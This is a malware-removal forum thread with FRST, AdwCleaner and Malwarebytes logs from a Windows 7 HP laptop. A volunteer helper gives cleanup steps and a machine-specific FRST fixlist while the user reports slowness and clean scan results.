Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\…\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\…\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\…\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\…\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\…\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\…\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\…\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\…\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\…\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\…\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\…\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\…\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\…\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 49.0.1 (x86 en-US) (HKLM-x32\…\Mozilla Firefox 49.0.1 (x86 en-US)) (Version: 49.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\…\MozillaMaintenanceService) (Version: 49.0.1 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\…\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\…\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4859.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4859.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4859.1002 - Microsoft Corporation) Hidden
opensource (x32 Version: 1.0.14960.3876 - Your Company Name) Hidden
PDF Complete Special Edition (HKLM-x32\…\PDF Complete) (Version: 4.0.65 - PDF Complete, Inc)
PlayReady PC Runtime amd64 (HKLM\…\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
PlayReady PC Runtime x86 (HKLM-x32\…\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Power2Go (HKLM-x32\…\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.5706 - CyberLink Corp.)
Power2Go (x32 Version: 6.1.5706 - CyberLink Corp.) Hidden
PressReader (HKLM-x32\…\{912CED74-88D3-4C5B-ACB0-132318649765}) (Version: 5.11.0721.0 -  NewspaperDirect Inc.)
Ralink 802.11n Wireless LAN Card (HKLM-x32\…\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 4.0.3.0 - Ralink)
Realtek High Definition Audio Driver (HKLM-x32\…\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7404 - Realtek Semiconductor Corp.)
Realtek PCIE Card Reader (HKLM-x32\…\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.1.7601.28099 - Realtek Semiconductor Corp.)
Recovery Manager (x32 Version: 5.5.0.4424 - CyberLink Corp.) Hidden
Remote Graphics Receiver (HKLM-x32\…\{16FC3056-90C0-4757-8A68-64D8DA846ADA}) (Version: 5.4.5 - Hewlett-Packard)
Skype Click to Call (HKLM-x32\…\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.3.0.9150 - Microsoft Corporation)
Skype™ 7.18 (HKLM-x32\…\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.18.112 - Skype Technologies S.A.)
TSHostedAppLauncher (x32 Version: 5.1.15.0 - Hewlett-Packard) Hidden
Visual Studio 2012 x64 Redistributables (HKLM\…\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\…\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Live Essentials (HKLM-x32\…\WinLiveSuite) (Version: 15.4.3538.0513 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\…\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Zinio Reader 4 (HKLM-x32\…\ZinioReader4) (Version: 4.2.4164 - Zinio LLC)
Zinio Reader 4 (x32 Version: 4.2.4164 - Zinio LLC) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {22852B46-8F0C-4D94-8513-1A0C212197A1} - System32\Tasks\HPCeeScheduleForjames => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {2B4CB5D9-253B-484E-BE04-29BAFBB161E6} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2016-07-26] (Microsoft Corporation)
Task: {2C309322-D834-437B-9DA0-C6F681F537FF} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2016-07-26] (Microsoft Corporation)
Task: {5277B290-AA4A-46D0-A3A4-8527082EB17F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-01-21] (Piriform Ltd)
Task: {58295684-8B8F-4624-90AE-88F33720E6A5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {58E3B383-F2AA-4C48-80FF-781C38366113} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFReport.exe [2016-02-18] (Hewlett-Packard)
Task: {7D93C517-09BD-4FB1-A600-9DCD0EBB088A} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2011-08-17] (CyberLink)
Task: {980B73F8-226A-4818-B60F-612BA0A8EC59} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-09-16] (Adobe Systems Incorporated)
Task: {AA8EF2D5-1020-4EEB-90B8-D170FDA8C59C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2016-07-06] (HP Inc.)
Task: {ACC5775B-B02F-4493-8F21-46B2757F5E9C} - System32\Tasks\HPCustParticipation HP Officejet 4620 series => C:\Program Files\HP\HP Officejet 4620 series\Bin\HPCustPartic.exe [2011-12-18] (Hewlett-Packard Co.)
Task: {F27A003E-279B-4DE2-B8A9-A1B0959128BB} - System32\Tasks\HPOSIAPP64 => C:\Program Files (x86)\Hewlett-Packard\HP Keyboard\ModLEDKey.exe [2009-02-27] ()

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\HPCeeScheduleForjames.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2016-07-22 15:11 - 2016-05-24 12:43 - 08909504 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2012-04-12 01:04 - 2009-02-27 22:13 - 00053248 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Keyboard\ModLEDKey.exe
2014-03-19 20:20 - 2016-05-24 09:51 - 00116416 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2012-01-27 11:11 - 2012-01-27 11:11 - 00369152 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2011-11-02 17:03 - 2011-11-02 17:03 - 00098304 _____ () c:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2012-04-12 01:04 - 2009-02-19 20:22 - 00028672 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Keyboard\WMINPUT.DLL

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 22:34 - 2015-07-02 13:00 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1       localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-531013560-757715300-2485835200-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\james\AppData\Roaming\Mozilla\Firefox\Desktop Background.bmp
DNS Servers: [removed] - [removed]
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\startupreg: HP Officejet 4620 series (NET) => "C:\Program Files\hp\HP Officejet 4620 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN24D131GD05S1:NW" -scfn "HP Officejet 4620 series (NET)" -AutoStart 1
MSCONFIG\startupreg: HP Software Update => c:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: hpsysdrv => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe
MSCONFIG\startupreg: Magic Canvas => "C:\Program Files (x86)\Hewlett-Packard\TouchSmart\SmartCenter\SmartCenter.exe"
MSCONFIG\startupreg: NCPluginUpdater => "C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe" Update
MSCONFIG\startupreg: PDF Complete => C:\Program Files (x86)\PDF Complete\pdfsty.exe

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{ED583B53-1517-45DE-B2DB-58319D750E64}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{C6C97EAB-6BA9-4865-9AA7-5FB98AB82B53}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\Remote Graphics Receiver\rgreceiver.exe
FirewallRules: [{EAFF86DF-AB98-47EC-AACD-400A09433A88}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\Remote Graphics Receiver\rgreceiver.exe
FirewallRules: [{7C696241-CEF0-4F9E-8F8B-4BB9CD7E1F20}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP LinkUp\HP LinkUp Viewer.exe
FirewallRules: [{B5089284-FF6F-42A7-947D-C99634AACE0A}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP LinkUp\HP LinkUp Viewer.exe
FirewallRules: [{A3502F13-E030-46B8-B261-536D7498F7A3}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{796A7A0B-6A56-439B-A645-6E018D079A5A}] => (Allow) LPort=2869
FirewallRules: [{D1D8810B-6D7A-4495-A4B8-09D223F767F8}] => (Allow) LPort=1900
FirewallRules: [{BFDD6086-C239-42A9-8020-269CF5466147}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{76438ADC-EE49-4503-8249-7EA06C147377}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe
FirewallRules: [{281C0700-D1C2-4946-BBBB-FBE56A290FBF}] => (Allow) C:\Program Files\HP\HP Officejet 4620 series\bin\FaxApplications.exe
FirewallRules: [{C6539288-9F9C-4962-80B4-5634C1B1E30F}] => (Allow) C:\Program Files\HP\HP Officejet 4620 series\bin\DigitalWizards.exe
FirewallRules: [{3581F2AE-CFBE-4952-860B-DCD282CFDCA8}] => (Allow) C:\Program Files\HP\HP Officejet 4620 series\bin\SendAFax.exe
FirewallRules: [{0C596D8B-BFC3-4364-8C5E-84434C7152F6}] => (Allow) C:\Program Files\HP\HP Officejet 4620 series\Bin\DeviceSetup.exe
FirewallRules: [{B146E146-535B-456F-BB03-7D88187C53EB}] => (Allow) C:\Program Files\HP\HP Officejet 4620 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [{65F89F0B-FB7B-4871-97CD-3C9A5AE4A49A}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPPSdr\HPDiagnosticCoreUI.exe
FirewallRules: [{84870BBA-CCC3-41A5-8D42-D214D408A9CB}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPPSdr\HPDiagnosticCoreUI.exe
FirewallRules: [{1DF957FC-D2D3-46C7-BF0A-5EB8EE812B8B}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe
FirewallRules: [{EEE96708-82CD-4A92-B144-FF6CA2A660BF}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{D780AAC5-0E23-4F98-8A1E-BDC87A93106C}] => (Allow) C:\Users\james\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{4050BC5E-BAF1-47C4-BC87-A0C0489C4690}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{ED0D736A-31B9-46A4-A563-7F4B48CC743E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

==================== Restore Points =========================

31-08-2016 04:49:01 Windows Update
04-09-2016 07:34:43 Windows Update
07-09-2016 21:55:20 Windows Update
08-09-2016 23:12:15 JRT Pre-Junkware Removal
11-09-2016 19:59:05 Windows Update
16-09-2016 19:17:48 JRT Pre-Junkware Removal
22-09-2016 16:39:01 Windows Update
26-09-2016 00:51:33 JRT Pre-Junkware Removal
26-09-2016 12:17:47 AA11
26-09-2016 12:31:44 AA11
26-09-2016 12:59:06 JRT Pre-Junkware Removal
30-09-2016 18:06:15 ComboFix created restore point

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (09/30/2016 05:20:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CALMAIN.exe, version: 8.1.0.14, time stamp: 0x433d11f9
Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722
Exception code: 0xc0000005
Fault offset: 0x00009966
Faulting process id: 0x638
Faulting application start time: 0x01d21b367f2e4b68
Faulting application path: C:\Program Files (x86)\Canon\CAL\CALMAIN.exe
Faulting module path: C:\Windows\syswow64\msvcrt.dll
Report Id: aca312d6-8753-11e6-8979-047d7bd68a6c

Error: (09/15/2016 07:43:00 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "C:\Users\james\Downloads\esetsmartinstaller_enu(1).exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d.manifest.

Error: (09/15/2016 07:43:00 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "C:\Users\james\Downloads\esetsmartinstaller_enu.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d.manifest.

Error: (09/15/2016 06:32:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CALMAIN.exe, version: 8.1.0.14, time stamp: 0x433d11f9
Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722
Exception code: 0xc0000005
Fault offset: 0x00009966
Faulting process id: 0xbe4
Faulting application start time: 0x01d20f8b9fd21330
Faulting application path: C:\Program Files (x86)\Canon\CAL\CALMAIN.exe
Faulting module path: C:\Windows\syswow64\msvcrt.dll
Report Id: 431b3b4a-7b94-11e6-9204-047d7bd68a6c

Error: (09/14/2016 07:03:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CALMAIN.exe, version: 8.1.0.14, time stamp: 0x433d11f9
Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722
Exception code: 0xc0000005
Fault offset: 0x00009966
Faulting process id: 0x574
Faulting application start time: 0x01d20ed6df1649a2
Faulting application path: C:\Program Files (x86)\Canon\CAL\CALMAIN.exe
Faulting module path: C:\Windows\syswow64\msvcrt.dll
Report Id: 83c03d50-7acf-11e6-a0af-047d7bd68a6c

Error: (09/12/2016 07:14:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CALMAIN.exe, version: 8.1.0.14, time stamp: 0x433d11f9
Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722
Exception code: 0xc0000005
Fault offset: 0x00009966
Faulting process id: 0x438
Faulting application start time: 0x01d20d2cf1966348
Faulting application path: C:\Program Files (x86)\Canon\CAL\CALMAIN.exe
Faulting module path: C:\Windows\syswow64\msvcrt.dll
Report Id: 9f42cd6c-793e-11e6-8332-047d7bd68a6c

Error: (09/11/2016 05:56:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CALMAIN.exe, version: 8.1.0.14, time stamp: 0x433d11f9
Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722
Exception code: 0xc0000005
Fault offset: 0x00009966
Faulting process id: 0xb4c
Faulting application start time: 0x01d20c35a338a1c8
Faulting application path: C:\Program Files (x86)\Canon\CAL\CALMAIN.exe
Faulting module path: C:\Windows\syswow64\msvcrt.dll
Report Id: 87daba12-786a-11e6-9184-047d7bd68a6c

Error: (09/10/2016 08:13:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CALMAIN.exe, version: 8.1.0.14, time stamp: 0x433d11f9
Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722
Exception code: 0xc0000005
Fault offset: 0x00009966
Faulting process id: 0x9b4
Faulting application start time: 0x01d20bb3634f46a7
Faulting application path: C:\Program Files (x86)\Canon\CAL\CALMAIN.exe
Faulting module path: C:\Windows\syswow64\msvcrt.dll
Report Id: 956444de-77b4-11e6-882c-047d7bd68a6c

Error: (09/06/2016 08:42:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CALMAIN.exe, version: 8.1.0.14, time stamp: 0x433d11f9
Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722
Exception code: 0xc0000005
Fault offset: 0x00009966
Faulting process id: 0x928
Faulting application start time: 0x01d2088d7a1173c2
Faulting application path: C:\Program Files (x86)\Canon\CAL\CALMAIN.exe
Faulting module path: C:\Windows\syswow64\msvcrt.dll
Report Id: ea2201e8-7493-11e6-843c-047d7bd68a6c

Error: (09/04/2016 03:01:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CALMAIN.exe, version: 8.1.0.14, time stamp: 0x433d11f9
Faulting module name: msvcrt.dll, version: 7.0.7601.17744, time stamp: 0x4eeaf722
Exception code: 0xc0000005
Fault offset: 0x00009966
Faulting process id: 0xb68
Faulting application start time: 0x01d206aee0975898
Faulting application path: C:\Program Files (x86)\Canon\CAL\CALMAIN.exe
Faulting module path: C:\Windows\syswow64\msvcrt.dll
Report Id: 07baed48-72d2-11e6-9950-047d7bd68a6c


System errors:
=============
Error: (10/01/2016 09:36:26 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.229.508.0

    Update Source: Microsoft Update Server

    Update Stage: Search

    Source Path: http://www.microsoft.com

    Signature Type: AntiVirus

    Update Type: Full

    User: NT AUTHORITY\SYSTEM

    Current Engine Version:

    Previous Engine Version: 1.1.13103.0

    Error code: 0x8024001e

    Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.

Error: (10/01/2016 09:36:10 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error:
An instance of the service is already running.

Error: (10/01/2016 09:35:40 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Presentation Foundation Font Cache 3.0.0.0 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 0 milliseconds: Restart the service.

Error: (10/01/2016 09:35:40 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The HP Support Assistant Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.

Error: (10/01/2016 09:35:42 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Error: (10/01/2016 09:35:40 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The CalendarSynchService service terminated unexpectedly.  It has done this 1 time(s).

Error: (10/01/2016 09:35:40 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Media Player Network Sharing Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.

Error: (10/01/2016 09:35:40 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.

Error: (10/01/2016 09:35:40 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Canon Camera Access Library 8 service terminated unexpectedly.  It has done this 1 time(s).

Error: (10/01/2016 09:35:40 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Live ID Sign-in Assistant service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.


==================== Memory info ===========================

Processor: AMD E2-1800 APU with Radeon™ HD Graphics
Percentage of memory in use: 57%
Total physical RAM: 3700.66 MB
Available physical RAM: 1582.96 MB
Total Virtual: 7399.51 MB
Available Virtual: 5194.23 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:448.46 GB) (Free:394.38 GB) NTFS
Drive d: (HP_RECOVERY) (Fixed) (Total:17.2 GB) (Free:2.12 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 2C929540)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=448.5 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=17.2 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

That’s looking better.

Uninstall AdwCleaner

  • double click on adwcleaner.exe to run the tool
  • click on Uninstall
  • confirm with Yes

Download AdwCleaner again from here and save it to your desktop.

  • run AdwCleaner
  • when it has finished, allow AdwCleaner to deleteeverything it found, then click on Clean
  • if it asks to reboot, allow the reboot
  • on reboot a log will be produced; please attach the content of the log to your next reply.

===================================================

Run Malwarebytes’ Anti-Malware

I noticed that you had MBAM on your system: if you no longer have it, you can download it from here:

  • on the Dashboard, click Update Now
  • after the update completes, click the Scan Now' button.
  • if an update is available, clicking the Update Now button will update it
  • a Threat Scan will begin.
  • when the scan is complete, if malware has been detected, click Apply Actions to allow MBAM to clean what was found
  • when the prompt to restart the computer appears, click Yes.
  • after the restart once you are back at your desktop, open MBAM once more
  • click on the “History” tab, the “Application Logs”
  • double-click on the scan log which shows the date and time of the scan just performed.
  • click Copy to Clipboard
  • please paste the contents of the clipboard into your reply.

Logs to include with the next post:

AdwCleaner log
Mbam.txt


Can you tell me if there are any outstanding problems.

Satchfan

 

PC is still sluggish, CPU usage remains at 55 to 65 + %.

Have not had any pop-ups or re-directs since we started but browsing has been very limited.

 

Here are the requested logs, neither program found anything.

 

# AdwCleaner v6.020 - Logfile created 01/10/2016 at 11:28:58
# Updated on 14/09/2016 by ToolsLib
# Database : 2016-09-30.1 [Server]
# Operating System : Windows 7 Home Premium Service Pack 1 (X64)
# Username : james - JAMES-HP
# Running from : C:\Users\james\Desktop\adwcleaner_6.020.exe
# Mode: Clean
# Support : https://toolslib.net/forum



***** [ Services ] *****



***** [ Folders ] *****



***** [ Files ] *****



***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****



***** [ Registry ] *****



***** [ Web browsers ] *****



*************************

:: "Tracing" keys deleted

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [728 Bytes] - [01/10/2016 11:28:58]
C:\AdwCleaner\AdwCleaner[S0].txt - [1148 Bytes] - [01/10/2016 11:27:19]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [873 Bytes] ##########

 

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/1/2016
Scan Time: 11:36 AM
Logfile: MBAM.txt
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.10.01.03
Rootkit Database: v2016.09.26.02
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: james

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 320449
Time Elapsed: 40 min, 34 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)
 

There’s a lot of unnecessary HP ‘Bloatware’ on your computer that is contributing to draining resources but no malware that I can see that could be causing it now.

There were a couple of entries that need to be removed and then I’d like you to run another scan.


Run Farbar Recovery Scan Tool

Open notepad. Please copy the contents of the code box below and paste it into Notepad.

CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
Toolbar: HKU\S-1-5-21-531013560-757715300-2485835200-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
2016-09-29 16:03 - 2016-09-29 16:03 - 00000484 _____ C:\Users\james\Documents\cc_20160929_160328.reg

NOTE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

  • save the files as fixlist.txt in the same folder as FRST – NOTE: It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work
  • run FRST64 then click Fix just once and wait
  • it will create a log on your desktop, (Fixlog.txt); please post it to your reply.

================================================

Download zoek.exe to your Desktop:

Important: Disable your AntiVirus and AntiSpyware programs, so they do not interfere with the running of Zoek.exe. You can find instructions how to disable your security applications here.

